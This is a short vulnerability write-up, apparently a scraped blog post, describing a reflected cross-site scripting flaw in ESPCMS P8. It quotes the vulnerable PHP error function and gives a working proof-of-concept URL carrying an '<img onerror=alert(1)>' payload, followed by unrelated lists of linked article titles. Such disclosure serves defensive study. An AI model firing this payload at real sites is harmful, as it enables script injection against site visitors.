Download the source code first

In the directory espcms_web\espcms_load.php line 67

if (!is_file($module_filename)) {

    espcms_message_err('public_pack-espcms_module_file_err', array($ac_name));

}

Will return the html code directly

function espcms_message_err($message_code, $format_code = array()) {

    $title = espcms_lan_pack('public_pack-espcms_soft_title_err');

    $message_lan = espcms_lan_pack($message_code);

    if (isset($message_lan) && !empty($message_lan) && is_array($format_code) && count($format_code) > 0) {

        $message = vsprintf($message_lan, $format_code);

    } else {

        $message = $message_lan;

    }

    $message_html_code = '<!DOCTYPE html>

    <html xmlns="http://www.w3.org/1999/xhtml" dir=\'ltr\'>

    <head>

        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

        <title>' . $title . '</title>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/jquery.min.js"></script>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/iframeResizer.contentWindow.min.js"></script>

        <style type="text/css">

            html {

                background: #eee;

            }

            body {

                background: #fff;

                color: #333;

                font-family: "Open Sans", sans-serif;

                margin: 2em auto;

                padding: 20px;

                max-width: 92%;

                -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.13);

                box-shadow: 0 1px 3px rgba(0,0,0,0.13);

            }

            h1 {

                border-bottom: 1px solid #dadada;

                clear: both;

                color: #666;

                font: 24px "Open Sans", sans-serif;

                margin: 30px 0 0 0;

                padding: 0;

                padding-bottom: 7px;

            }

            #error-page {

                margin-top:40px;

            }

            #error-page p {

                font-size: 14px;

                line-height: 1.5;

                margin: 25px 0 20px;

            }

            #error-page code {

                font-family: Consolas, Monaco, monospace;

            }

            ul li {

                margin-bottom: 10px;

                font-size: 14px ;

            }

            a {

                color: #333;

                text-decoration: underline;

            }

            a:hover {

                color: #fa0000;

                text-decoration: underline;

            }

            .button {

                background: #f7f7f7;

                border: 1px solid #cccccc;

                color: #555;

                display: inline-block;

                text-decoration: none;

                font-size: 13px;

                line-height: 26px;

                height: 28px;

                margin: 0;

                padding: 0 10px 1px;

                cursor: pointer;

                -webkit-border-radius: 3px;

                -webkit-appearance: none;

                border-radius: 3px;

                white-space: nowrap;

                -webkit-box-sizing: border-box;

                -moz-box-sizing:    border-box;

                box-sizing:         border-box;

                -webkit-box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                vertical-align: top;

            }

            .button.button-large {

                height: 29px;

                line-height: 28px;

                padding: 0 12px;

            }

            .button:hover,

            .button:focus {

                background: #fafafa;

                border-color: #999;

                color: #222;

            }

            .button:focus  {

                -webkit-box-shadow: 1px 1px 1px rgba(0,0,0,.2);

                box-shadow: 1px 1px 1px rgba(0,0,0,.2);

            }

            .button:active {

                background: #eee;

                border-color: #999;

                color: #333;

                -webkit-box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

                box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

            }

            code {

                font-size:14px;padding:0px 5px;color:#eb3609;

            }

        </style>

    </head>

    <body id="error-page">' . $message . '</body></html>';

    exit($message_html_code);

}

Directly cause cross-site scripting

We request directly

http://127.0.0.1/espcms/index.php?ac=<img src=1 onerror=alert(1)>&at=List

ESPCMS P8 stable version Front-end reflective xss的更多相关文章

  1. nginx的Mainline version、Stable version、Legacy version

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  2. nginx的MainLine version、Stable version、Legacy versions

    Nginx的版本说明Mainline version:在线版本,正处于开发状态Stable version :稳定版本(一般下载使用)Legacy version :遗留版本,遗留的老的版本 Linu ...

  3. nginx的Mainline version、Stable version、Legacy version的版本区别

    nginx的Mainline version.Stable version.Legacy version的版本区别 创建时间:2014-01-16 10:30:37最后修改:2014-09-23 20 ...

  4. Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer.

    Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer. Release date: ...

  5. espcms P8.19082801 vulnerability

    author: naiquan chai Net name:Hanamizuki花水木 Through  the vulnerability  we can get the webshell if w ...

  6. 编译安装redis-3.2.9(latest stable version)

    What is the Redis? Redis is an open source (BSD licensed), in-memory data structure store, used as a ...

  7. Mainline/Stable/Legacy

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  8. 一个新的Android Studio 2.3.3可以在稳定的频道中使用。A new Android Studio 2.3.3 is available in the stable channel.

    作者:韩梦飞沙 Author:han_meng_fei_sha 邮箱:313134555@qq.com E-mail: 313134555 @qq.com 一个新的Android Studio 2.3 ...

  9. Nginx官方版本说明##Mainline &Stable&Legacy versions

    Nginx (Mainline Stable Legacy)区别 Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发 ...

随机推荐

  1. 一条数据的HBase之旅,简明HBase入门教程4:集群角色

    [摘要] 本文主要介绍HBase与HDFS的关系,一些关键进程角色,以及在部署上的建议 HBase与HDFS 我们都知道HBase的数据是存储于HDFS里面的,相信大家也都有这么的认知: HBase是 ...

  2. MongoDB第三天(正则,管道,聚合,字符串,算术,日期,java连接MongoDB)

    部分正则表达式: i:忽略大小写 m:多行查找 x:设置 x 选项后,正则表达式中的非转义的空白字符将被忽略.   s:允许点字符(即.)匹配包括换行符在内的所有字符. w:匹配包括下划线的任何单词字 ...

  3. GZIP怎么运用在.NET MVC 简单实现

    ZIP压缩其实就是将网页内容压缩,减少HTML代码网络传输的代价,来提高Web性能. 这个请求的过程解释一下: 1:客户端Request请求.Http_header中会根据相应的浏览器发送相应的编码规 ...

  4. 2019 湖南多校第一场(2018~2019NCPC) 题解

    解题过程 开场shl过B,C,然后lfw写J,J WA了以后shl写A,但是因为OJ上空间开小WA了,而不是MLE?,J加了特判过了.之后一直在检查A错哪了,直到qt发现问题改了空间,浪费许多时间,但 ...

  5. 分布式监控数据采集系统Ganglia实战

    一.什么是Ganglia 对于这个工具,大家可能比较陌生,但是它功能非常强大,如果我们想收集所有服务器.网络设备的数据,那么ganglia绝对是首选,在深入学习之前,还是先从基础概念了解起吧! Gan ...

  6. 记录我的 python 学习历程-Day06 is id == / 代码块 / 集合 / 深浅拷贝

    一.is == id 用法 在Python中,id是内存地址, 你只要创建一个数据(对象)那么就会在内存中开辟一个空间,将这个数据临时加载到内存中,这个空间有一个唯一标识,就好比是身份证号,标识这个空 ...

  7. 为什么HashMap的加载因子是0.75?

    说在前面 ​ 在HashMap中,默认创建的数组长度是16,也就是哈希桶个数为16,当添加key-value的时候,会先计算出他们的哈希值(h = hash),然后用return h & (l ...

  8. Centos7调整root分区大小

    由于centos安装完毕后一般给root只有50G左右,而home牛大, 所以多数时候需要把home弄小,root给扩展大一点 折腾一下 首先切好用户到root用户登陆,我用的systemctl se ...

  9. Linux下如何编辑pdf文件目录

    目前,我使用的是系统LinuxMint,之前硬盘没坏时都是用Foxit Reader和Okular查看pdf文件,可是后来发现Foxit Reader十分吃CPU,而且现在换了固态硬盘之后只有120G ...

  10. C# DataTable 某一列取算

    1. 列为数字类型double total= Convert.ToDouble(datatable.Compute("SUM(需要求和的参数)", "")); ...